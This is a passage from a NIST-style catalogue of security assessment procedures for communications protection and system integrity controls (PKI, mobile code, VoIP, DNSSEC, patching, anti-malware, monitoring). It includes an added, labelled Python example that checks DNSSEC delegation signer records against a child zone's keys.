Supplemental Guidance: For user certificates, each agency either establishes an agency certification authority cross-certified with the Federal Bridge Certification Authority at medium assurance or higher or uses certificates from an approved, shared service provider, as required by OMB Memorandum 05-24. NIST Special Publication 800-32 provides guidance on public key technology. NIST Special Publication 800-63 provides guidance on remote electronic authentication.
SC-17.1 ASSESSMENT OBJECTIVE:
Determine if the organization issues public key certificates under an appropriate certificate policy or obtains public key certificates under an appropriate certificate policy from an approved service provider.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing public key infrastructure certificates; public key certificate policy or policies; public key issuing process; NIST Special Publication 800-32; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with public key infrastructure certificate issuing responsibilities]. (M) (H)


ASSESSMENT PROCEDURE
SC-18 MOBILE CODE
Control: The organization: (i) establishes usage restrictions and implementation guidance for mobile code technologies based on the potential to cause damage to the information system if used maliciously; and (ii) authorizes, monitors, and controls the use of mobile code within the information system.
Supplemental Guidance: Mobile code technologies include, for example, Java, JavaScript, ActiveX, PDF, Postscript, Shockwave movies, Flash animations, and VBScript. Usage restrictions and implementation guidance apply to both the selection and use of mobile code installed on organizational servers and mobile code downloaded and executed on individual workstations. Control procedures prevent the development, acquisition, or introduction of unacceptable mobile code within the information system. NIST Special Publication 800-28 provides guidance on active content and mobile code.
SC-18.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization establishes usage restrictions and implementation guidance for mobile code technologies based on the potential to cause damage to the information system if used maliciously; and
(ii) the organization authorizes, monitors, and controls the use of mobile code within the information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing mobile code; mobile code usage restrictions, mobile code implementation guidance; NIST Special Publication 800-28; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with mobile code authorization, monitoring, and control responsibilities]. (M) (H)
Test: [SELECT FROM: Mobile code authorization and monitoring capability for the organization]. (H)


ASSESSMENT PROCEDURE
SC-19 VOICE OVER INTERNET PROTOCOL
Control: The organization: (i) establishes usage restrictions and implementation guidance for Voice over Internet Protocol (VoIP) technologies based on the potential to cause damage to the information system if used maliciously; and (ii) authorizes, monitors, and controls the use of VoIP within the information system.
Supplemental Guidance: NIST Special Publication 800-58 provides guidance on security considerations for VoIP technologies employed in information systems.
SC-19.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization establishes usage restrictions and implementation guidance for Voice over Internet Protocol technologies based on the potential to cause damage to the information system if used maliciously; and
(ii) the organization authorizes, monitors, and controls the use of VoIP within the information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing VoIP; NIST Special Publication 800-58; VoIP usage restrictions; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with VoIP authorization and monitoring responsibilities]. (M) (H)
Test: [SELECT FROM: VoIP authorization and monitoring capability for the organization]. (H)


ASSESSMENT PROCEDURE
SC-20 SECURE NAME / ADDRESS RESOLUTION SERVICE (AUTHORITATIVE SOURCE)
Control: The information system that provides name/address resolution service provides additional data origin and integrity artifacts along with the authoritative data it returns in response to resolution queries.
Supplemental Guidance: This control enables remote clients to obtain origin authentication and integrity verification assurances for the name/address resolution information obtained through the service. A domain name system (DNS) server is an example of an information system that provides name/address resolution service; digital signatures and cryptographic keys are examples of additional artifacts; and DNS resource records are examples of authoritative data. NIST Special Publication 800-81 provides guidance on secure domain name system deployment.
SC-20.1 ASSESSMENT OBJECTIVE:
Determine if the information system (if the system provides a name/address resolution service) provides additional data origin authentication and data integrity artifacts along with the authoritative data it returns in response to resolution queries.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing secure name/address resolution service (authoritative source); NIST Special Publication 800-81; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing secure name/address resolution service (authoritative source)]. (H)
SC-20(1) SECURE NAME / ADDRESS RESOLUTION SERVICE (AUTHORITATIVE SOURCE)
Control Enhancement:
The information system, when operating as part of a distributed, hierarchical namespace, provides the means to indicate the security status of child subspaces and (if the child supports secure resolution services) enable verification of a chain of trust among parent and child domains.
Enhancement Supplemental Guidance: An example means to indicate the security status of child subspaces is through the use of delegation signer resource records.
SC-20(1).1 ASSESSMENT OBJECTIVE:
Determine if the information system, when operating as part of a distributed, hierarchical namespace, provides the means to indicate the security status of child subspaces and (if the child supports secure resolution services) enable verification of a chain of trust among parent and child domains.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing secure name/address resolution service (authoritative source); information system design documentation; information system configuration settings and associated documentation; other relevant documents or records].
Test: [SELECT FROM: Automated mechanisms implementing child subspace security status indicators and chain of trust verification for resolution services].


ASSESSMENT PROCEDURE
SC-21 SECURE NAME / ADDRESS RESOLUTION SERVICE (RECURSIVE OR CACHING RESOLVER)
Control: The information system that provides name/address resolution service for local clients performs data origin authentication and data integrity verification on the resolution responses it receives from authoritative sources when requested by client systems.
Supplemental Guidance: A resolving or caching domain name system (DNS) server is an example of an information system that provides name/address resolution service for local clients and authoritative DNS servers are examples of authoritative sources. NIST Special Publication 800-81 provides guidance on secure domain name system deployment.
SC-21.1 ASSESSMENT OBJECTIVE:
Determine if the information system that provides name/address resolution service for local clients performs data origin authentication and data integrity verification on the resolution responses it receives from authoritative sources when requested by client systems.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing secure name/address resolution service (recursive or caching resolver); information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (H)
Test: [SELECT FROM: Automated mechanisms implementing data origin authentication and integrity verification for resolution services]. (H)
SC-21(1) SECURE NAME / ADDRESS RESOLUTION SERVICE (RECURSIVE OR CACHING RESOLVER)
Control Enhancement:
The information system performs data origin authentication and data integrity verification on all resolution responses whether or not local clients explicitly request this service.
Enhancement Supplemental Guidance: Local clients include, for example, DNS stub resolvers.
SC-21(1).1 ASSESSMENT OBJECTIVE:
Determine if the information system performs data origin authentication and data integrity verification on all resolution responses received whether or not client systems explicitly request this service.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing secure name/address resolution service (recursive or caching resolver); NIST Special Publication 800-81; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records].
Test: [SELECT FROM: Automated mechanisms implementing data origin authentication and integrity verification for resolution services].
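The delegation signer check behind SC-20(1) (indicating a child subspace's security status through DS records) and SC-21 (a resolver authenticating what it receives), as an added example that is not part of NIST SP 800-53A: it computes a DNSKEY's key tag and SHA-256 DS digest per RFC 4034/4509 and reports whether a parent's DS set authenticates a child zone's keys. The zone names and key bytes are constructed for the example, so it runs offline.

```python
"""Delegation signer (DS) check for a DNSSEC chain of trust.

Added example, not part of NIST SP 800-53A. Key tag and DS digest follow
RFC 4034 (Appendix B, section 5.1.4) and RFC 4509 (SHA-256); the status
names follow RFC 4035. All zone names and key bytes below are constructed.
"""
import hashlib
import hmac
import struct
from dataclasses import dataclass
from typing import Iterable

DIGEST_SHA256 = 2       # DS digest type 2 (RFC 4509)
FLAG_ZONE_KEY = 0x0100  # DNSKEY flags bit 7: this key signs zone data


@dataclass(frozen=True)
class DNSKEY:
    owner: str        # zone name the key belongs to, e.g. "child.example."
    flags: int        # 256 = zone key (ZSK), 257 = zone key + SEP bit (KSK)
    protocol: int     # fixed at 3 for DNSSEC
    algorithm: int    # e.g. 13 = ECDSAP256SHA256
    public_key: bytes


@dataclass(frozen=True)
class DS:
    key_tag: int
    algorithm: int
    digest_type: int
    digest: bytes


def owner_wire(name: str) -> bytes:
    """Canonical wire form of an owner name: lowercase, length-prefixed labels, root label last."""
    labels = [l for l in name.lower().rstrip(".").split(".") if l]
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def dnskey_rdata(key: DNSKEY) -> bytes:
    """DNSKEY RDATA: flags (2 bytes), protocol (1), algorithm (1), public key."""
    return struct.pack("!HBB", key.flags, key.protocol, key.algorithm) + key.public_key


def key_tag(key: DNSKEY) -> int:
    """RFC 4034 Appendix B key tag: a 16-bit checksum used to pick candidate keys, not a security check."""
    ac = 0
    for i, b in enumerate(dnskey_rdata(key)):
        ac += b if i & 1 else b << 8
    ac += (ac >> 16) & 0xFFFF
    return ac & 0xFFFF


def make_ds(key: DNSKEY, digest_type: int = DIGEST_SHA256) -> DS:
    """The DS record a parent publishes for a child key: hash(owner name | DNSKEY RDATA)."""
    if digest_type != DIGEST_SHA256:
        raise ValueError("only digest type 2 (SHA-256) is implemented in this example")
    digest = hashlib.sha256(owner_wire(key.owner) + dnskey_rdata(key)).digest()
    return DS(key_tag(key), key.algorithm, digest_type, digest)


def delegation_status(parent_ds: Iterable[DS], child_keys: Iterable[DNSKEY]) -> str:
    """Security status of a child subspace as a validating resolver would classify it.

    "secure":   a DS at the parent matches one of the child's zone keys.
    "insecure": the parent publishes no DS, so the child is unsigned. A real
                validator accepts this only after an authenticated denial
                (NSEC/NSEC3) proving the DS is absent.
    "bogus":    the parent says the child is signed, but no presented key
                matches; the child's data must not be trusted.
    """
    parent_ds = list(parent_ds)
    child_keys = list(child_keys)
    if not parent_ds:
        return "insecure"
    for ds in parent_ds:
        if ds.digest_type != DIGEST_SHA256:
            continue  # unsupported digest type: this DS cannot be used to validate
        for key in child_keys:
            if not key.flags & FLAG_ZONE_KEY:
                continue
            if ds.key_tag != key_tag(key) or ds.algorithm != key.algorithm:
                continue
            if hmac.compare_digest(make_ds(key, ds.digest_type).digest, ds.digest):
                return "secure"
    return "bogus"


# Constructed sample material (not real zone keys): 64 arbitrary bytes stand in
# for an ECDSA P-256 public key.
CHILD_KSK = DNSKEY("Child.Example.", 257, 3, 13, bytes(range(1, 65)))
CHILD_ZSK = DNSKEY("child.example.", 256, 3, 13, bytes(range(65, 129)))
PARENT_DS = [make_ds(CHILD_KSK)]
# A key the parent never registered, e.g. one substituted into a spoofed response.
UNREGISTERED_KSK = DNSKEY("child.example.", 257, 3, 13, bytes(range(128, 192)))

if __name__ == "__main__":
    print("parent DS key tag:", PARENT_DS[0].key_tag)
    print("genuine child keys:", delegation_status(PARENT_DS, [CHILD_KSK, CHILD_ZSK]))
    print("substituted key:   ", delegation_status(PARENT_DS, [UNREGISTERED_KSK, CHILD_ZSK]))
    print("no DS at parent:   ", delegation_status([], [CHILD_KSK, CHILD_ZSK]))
```

An assessor can run the same computation against a real zone by feeding it the DNSKEY set served by the child and the DS set served by the parent; a "bogus" result is exactly the condition a validating resolver (SC-21) must refuse to pass to clients.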


ASSESSMENT PROCEDURE
SC-22 ARCHITECTURE AND PROVISIONING FOR NAME / ADDRESS RESOLUTION SERVICE
Control: The information systems that collectively provide name/address resolution service for an organization are fault tolerant and implement role separation.
Supplemental Guidance: A domain name system (DNS) server is an example of an information system that provides name/address resolution service. To eliminate single points of failure and to enhance redundancy, there are typically at least two authoritative domain name system (DNS) servers, one configured as primary and the other as secondary. Additionally, the two servers are commonly located in two different network subnets and geographically separated (i.e., not located in the same physical facility). If organizational information technology resources are divided into those resources belonging to internal networks and those resources belonging to external networks, authoritative DNS servers with two roles (internal and external) are established. The DNS server with the internal role provides name/address resolution information pertaining to both internal and external information technology resources while the DNS server with the external role only provides name/address resolution information pertaining to external information technology resources. The list of clients who can access the authoritative DNS server of a particular role is also specified. NIST Special Publication 800-81 provides guidance on secure DNS deployment.
SC-22.1 ASSESSMENT OBJECTIVE:
Determine if the information systems that collectively provide name/address resolution service for an organization are fault tolerant and implement role separation.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing architecture and provisioning for name/address resolution service; access control policy and procedures; NIST Special Publication 800-81; information system design documentation; assessment results from independent testing organizations; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms supporting name/address resolution service for fault tolerance and role separation]. (H)


ASSESSMENT PROCEDURE
SC-23 SESSION AUTHENTICITY
Control: The information system provides mechanisms to protect the authenticity of communications sessions.
Supplemental Guidance: This control focuses on communications protection at the session, versus packet, level. The intent of this control is to implement session-level protection where needed (e.g., in service-oriented architectures providing web-based services). NIST Special Publication 800-52 provides guidance on the use of transport layer security (TLS) mechanisms. NIST Special Publication 800-77 provides guidance on the deployment of IPsec virtual private networks (VPNs) and other methods of protecting communications sessions. NIST Special Publication 800-95 provides guidance on secure web services.
SC-23.1 ASSESSMENT OBJECTIVE:
Determine if the information system provides mechanisms to protect the authenticity of communications sessions.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing session authenticity; NIST Special Publications 800-52, 800-77, and 800-95; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing session authenticity]. (H)


FAMILY:

System and Information Integrity


ASSESSMENT PROCEDURE
SI-1 SYSTEM AND INFORMATION INTEGRITY POLICY AND PROCEDURES
Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, system and information integrity policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the system and information integrity policy and associated system and information integrity controls.
Supplemental Guidance: The system and information integrity policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The system and information integrity policy can be included as part of the general information security policy for the organization. System and information integrity procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures.
SI-1.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops and documents system and information integrity policy and procedures;
(ii) the organization disseminates system and information integrity policy and procedures to appropriate elements within the organization;
(iii) responsible parties within the organization periodically review system and information integrity policy and procedures; and
(iv) the organization updates system and information integrity policy and procedures when organizational review indicates updates are required.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and information integrity policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with system and information integrity responsibilities]. (H)
SI-1.2 ASSESSMENT OBJECTIVE:
Determine if:
(i) the system and information integrity policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance;
(ii) the system and information integrity policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and
(iii) the system and information integrity procedures address all areas identified in the system and information integrity policy and address achieving policy-compliant implementations of all associated system and information integrity controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and information integrity policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with system and information integrity responsibilities]. (H)


ASSESSMENT PROCEDURE
SI-2 FLAW REMEDIATION
Control: The organization identifies, reports, and corrects information system flaws.
Supplemental Guidance: The organization identifies information systems containing software affected by recently announced software flaws (and potential vulnerabilities resulting from those flaws). The organization (or the software developer/vendor in the case of software developed and maintained by a vendor/contractor) promptly installs newly released security relevant patches, service packs, and hot fixes, and tests patches, service packs, and hot fixes for effectiveness and potential side effects on the organization's information systems before installation. Flaws discovered during security assessments, continuous monitoring, incident response activities, or information system error handling are also addressed expeditiously. Flaw remediation is incorporated into configuration management as an emergency change. NIST Special Publication 800-40 provides guidance on security patch installation and patch management. Related security controls: CA-2, CA-4, CA-7, CM-3, IR-4, SI-11.
SI-2.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization identifies, reports, and corrects information system flaws;
(ii) the organization installs newly released security patches, service packs, and hot fixes on the information system in a reasonable timeframe in accordance with organizational policy and procedures;
(iii) the organization addresses flaws discovered during security assessments, continuous monitoring, or incident response activities in an expeditious manner in accordance with organizational policy and procedures;
(iv) the organization tests information system patches, service packs, and hot fixes for effectiveness and potential side effects before installation; and
(v) the organization captures all appropriate information pertaining to the discovered flaws in the information system, including the cause of the flaws, mitigation activities, and lessons learned.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and information integrity policy; procedures addressing flaw remediation; NIST Special Publication 800-40; list of flaws and vulnerabilities potentially affecting the information system; list of recent security flaw remediation actions performed on the information system (e.g., list of installed patches, service packs, hot fixes, and other software updates to correct information system flaws); test results from the installation of software to correct information system flaws; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with flaw remediation responsibilities]. (M) (H)
SI-2(1) FLAW REMEDIATION
Control Enhancement:
The organization centrally manages the flaw remediation process and installs updates automatically.
SI-2(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization centrally manages the flaw remediation process and installs updates automatically.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and information integrity policy; procedures addressing flaw remediation; automated mechanisms supporting centralized management of flaw remediation and automatic software updates; information system design documentation; information system configuration settings and associated documentation; list of information system flaws; list of recent security flaw remediation actions performed on the information system; other relevant documents or records]. (H)
Test: [SELECT FROM: Automated mechanisms supporting centralized management of flaw remediation and automatic software updates]. (H)
SI-2(2) FLAW REMEDIATION
Control Enhancement:
The organization employs automated mechanisms to periodically and upon demand determine the state of information system components with regard to flaw remediation.
SI-2(2).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs automated mechanisms to periodically and upon demand determine the state of information system components with regard to flaw remediation.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and information integrity policy; procedures addressing flaw remediation; automated mechanisms supporting flaw remediation; information system design documentation; information system configuration settings and associated documentation; list of information system flaws; list of recent security flaw remediation actions performed on the information system; information system audit records; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing information system flaw remediation update status]. (M) (H)


ASSESSMENT PROCEDURE
SI-3 MALICIOUS CODE PROTECTION
Control: The information system implements malicious code protection.
Supplemental Guidance: The organization employs malicious code protection mechanisms at critical information system entry and exit points (e.g., firewalls, electronic mail servers, web servers, proxy servers, remote-access servers) and at workstations, servers, or mobile computing devices on the network. The organization uses the malicious code protection mechanisms to detect and eradicate malicious code (e.g., viruses, worms, Trojan horses, spyware) transported: (i) by electronic mail, electronic mail attachments, Internet accesses, removable media (e.g., USB devices, diskettes or compact disks), or other common means; or (ii) by exploiting information system vulnerabilities. The organization updates malicious code protection mechanisms (including the latest virus definitions) whenever new releases are available in accordance with organizational configuration management policy and procedures. The organization considers using malicious code protection software products from multiple vendors (e.g., using one vendor for boundary devices and servers and another vendor for workstations). The organization also considers the receipt of false positives during malicious code detection and eradication and the resulting potential impact on the availability of the information system. NIST Special Publication 800-83 provides guidance on implementing malicious code protection.
SI-3.1 ASSESSMENT OBJECTIVE:
Determine if the information system implements malicious code protection by verifying that:
  • the organization employs malicious code protection mechanisms at critical information system entry and exit points, and at workstations, servers, or mobile computing devices on the network to detect and eradicate malicious code;
  • the malicious code protection mechanisms detect and eradicate malicious code transported by electronic mail, electronic mail attachments, Internet access, removable media, or other common means, or by exploiting information system vulnerabilities;
  • the organization updates malicious code protection mechanisms whenever new releases are available, to include the latest malicious code definitions, in accordance with organizational configuration management policy and procedures;
  • the organization considers the use of malicious code protection software products from multiple vendors; and
  • the organization considers the receipt of false positives during malicious code detection and eradication and the resulting potential impact on the availability of the information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and information integrity policy; procedures addressing malicious code protection; NIST Special Publication 800-83; malicious code protection mechanisms; records of malicious code protection updates; information system configuration settings and associated documentation; other relevant documents or records]. (L) (M) (H)
Test: [SELECT FROM: Malicious code protection capability]. (M) (H)
SI-3(1) MALICIOUS CODE PROTECTION
Control Enhancement:
The organization centrally manages malicious code protection mechanisms.
SI-3(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization centrally manages malicious code protection mechanisms.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and information integrity policy; procedures addressing malicious code protection; information system design documentation; malicious code protection mechanisms; records of malicious code protection updates; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
SI-3(2) MALICIOUS CODE PROTECTION
Control Enhancement:
The information system automatically updates malicious code protection mechanisms.
SI-3(2).1 ASSESSMENT OBJECTIVE:
Determine if the organization automatically updates malicious code protection mechanisms.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and information integrity policy; procedures addressing malicious code protection; information system design documentation; malicious code protection mechanisms; records of malicious code protection updates; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)


ASSESSMENT PROCEDURE
SI-4 INFORMATION SYSTEM MONITORING TOOLS AND TECHNIQUES
Control: The organization employs tools and techniques to monitor events on the information system, detect attacks, and provide identification of unauthorized use of the system.
Supplemental Guidance: Information system monitoring capability is achieved through a variety of tools and techniques (e.g., intrusion detection systems, intrusion prevention systems, malicious code protection software, audit record monitoring software, network monitoring software). Monitoring devices are strategically deployed within the information system (e.g., at selected perimeter locations, near server farms supporting critical applications) to collect essential information. Monitoring devices are also deployed at ad hoc locations within the system to track specific transactions. Additionally, these devices are used to track the impact of security changes to the information system. The granularity of the information collected is determined by the organization based upon its monitoring objectives and the capability of the information system to support such activities. Organizations consult appropriate legal counsel with regard to all information system monitoring activities. Organizations heighten the level of information system monitoring activity whenever there is an indication of increased risk to organizational operations, organizational assets, or individuals based on law enforcement information, intelligence information, or other credible sources of information. NIST Special Publication 800-61 provides guidance on detecting attacks through various types of security technologies. NIST Special Publication 800-83 provides guidance on detecting malware-based attacks through malicious code protection software. NIST Special Publication 800-92 provides guidance on monitoring a